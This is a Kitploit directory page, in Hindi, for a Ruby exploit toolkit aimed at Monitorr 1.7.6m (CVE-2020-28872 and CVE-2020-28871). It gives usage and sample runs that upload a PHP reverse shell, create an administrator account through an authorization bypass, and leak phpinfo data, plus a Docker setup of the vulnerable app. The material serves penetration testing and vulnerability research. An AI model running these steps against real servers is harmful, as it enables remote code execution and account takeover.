Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
monitorr-exploit-toolkit — Monitorr के लिए कई एक्सप्लॉइट | Kitploit
उपकरण/GitHubGitHub/sec-it/monitorr-exploit-toolkit
प्रमाणीकरण और प्राधिकरणभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंग
GitHubsec-it/monitorr-exploit-toolkit

monitorr-exploit-toolkit

Monitorr के लिए कई एक्सप्लॉइट

रिपॉजिटरी देखें
101185 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Monitorr एक्सप्लॉइट टूलकिट

  • RCE असुरक्षित फ़ाइल अपलोड के माध्यम से (PHP रिवर्स शेल, वेबशेल, आदि)
  • व्यवस्थापक खाता निर्माण प्राधिकरण बाईपास के माध्यम से
  • तकनीकी सूचना रिसाव: Monitorr संस्करण, PHP संस्करण, सिस्टम संस्करण और कर्नेल, PHP कॉन्फ़िग, आदि।

CVE-2020-28872 और CVE-2020-28871 के लिए एक्सप्लॉइट।

[PacketStorm]

उपयोग

$ ruby exploit.rb -h
Monitorr-Exploit

Usage:
  exploit.rb upload <url> <file> [--debug]
  exploit.rb create <url> <user> <pass> <email> [--debug]
  exploit.rb version <url> [--debug]
  exploit.rb phpinfo <url> [--debug]
  exploit.rb -h | --help

upload:       Upload a file (RCE via unrestricted file upload)
version:      Try to fetch Monitorr version
phpinfo:      Extract main phpinfo() information (Information leakage)
create:       Create an administrator account (Authorization bypass)

Options:
  <url>       Root URL (base path) including HTTP scheme, port and root folder
  <file>      File to be uploaded
  --debug     Display arguments
  -h, --help  Show this screen

Examples:
  exploit.rb upload http://example.org revshell.php
  exploit.rb create https://example.org:8080/monitorr/ noraj password '[email protected]'
  exploit.rb version https://example.org:7000/

उदाहरण

रिवर्स शेल अपलोड करें:

$ ruby exploit.rb upload http://localhost:7000/ shell.php
[+] File uploaded:
http://localhost:7000//assets/data/usrimg/shell.php

व्यवस्थापक खाता निर्माण:

$ ruby exploit.rb create http://localhost:7000/ noraj20 password '[email protected]'
[+] User created
Username: noraj20
Email: [email protected]
Password: password

Monitorr संस्करण प्राप्त करें:

$ ruby exploit.rb version http://localhost:7000/
1.7.6m

phpinfp() प्राप्त करें:

$ ruby exploit.rb phpinfo http://localhost:7000/
System: Linux f0ded2053dda 5.12.12-zen1-1-zen #1 ZEN SMP PREEMPT Fri, 18 Jun 2021 21:59:24 +0000 x86_64 
PHP version: 7.1.17 
disable_functions: no value</i>
open_basedir: no value</i>

Full phpinfo() location: http://localhost:7000//assets/php/phpinfo.php

आवश्यकताएँ

  • httpx
  • docopt.rb

gem का उपयोग करते हुए उदाहरण:

bundle install
# or
gem install httpx docopt

असुरक्षित सॉफ़्टवेयर की Docker परिनियोजन

चेतावनी: निश्चित रूप से यह सेटअप उत्पादन उपयोग के लिए उपयुक्त नहीं है!

$ sudo docker-compose up

ऐप को http://127.0.0.1:7000/monitorr/settings.php पर सेटअप / आरंभ करें।

सीमाएँ

  • अपलोड: अपलोड की गई फ़ाइल में getimagesize से मेल खाने के लिए एक इमेज मैजिक बाइट (जैसे GIF) होना चाहिए (कोड)
  • निर्माण: पासवर्ड निर्माण के दौरान उपयोग किया गया पासवर्ड कम से कम 6 वर्णों का होना चाहिए (एप्लिकेशन न्यूनतम सीमा)

संदर्भ

  • लक्ष्य सॉफ़्टवेयर: Monitorr
    • स्रोत: https://github.com/Monitorr/Monitorr/
    • Docker: https://hub.docker.com/r/monitorr/monitorr/
    • असुरक्षित संस्करण: 1.7.6m

यह EDB-48981 (CVE-2020-28872) और EDB-48980 (CVE-2020-28871) का बेहतर पुनर्लेखन और संलयन है, साथ ही अतिरिक्त कार्यक्षमताएँ हैं।

अपलोड और व्यवस्थापक खाता निर्माण की कमज़ोरियाँ Lyhin's Lab द्वारा पाई गई थीं। phpinfo और Monitorr संस्करण रिसाव Alexandre ZANNI उर्फ noraj द्वारा पाए गए थे।

मूल एक्सप्लॉइट और कमज़ोरी का विश्लेषण:

  • व्हाइट-बॉक्स हैकिंग कैसे काम करती है: Monitorr 1.7.6 में प्राधिकरण बाईपास और रिमोट कोड निष्पादन
टूल डाउनलोड करें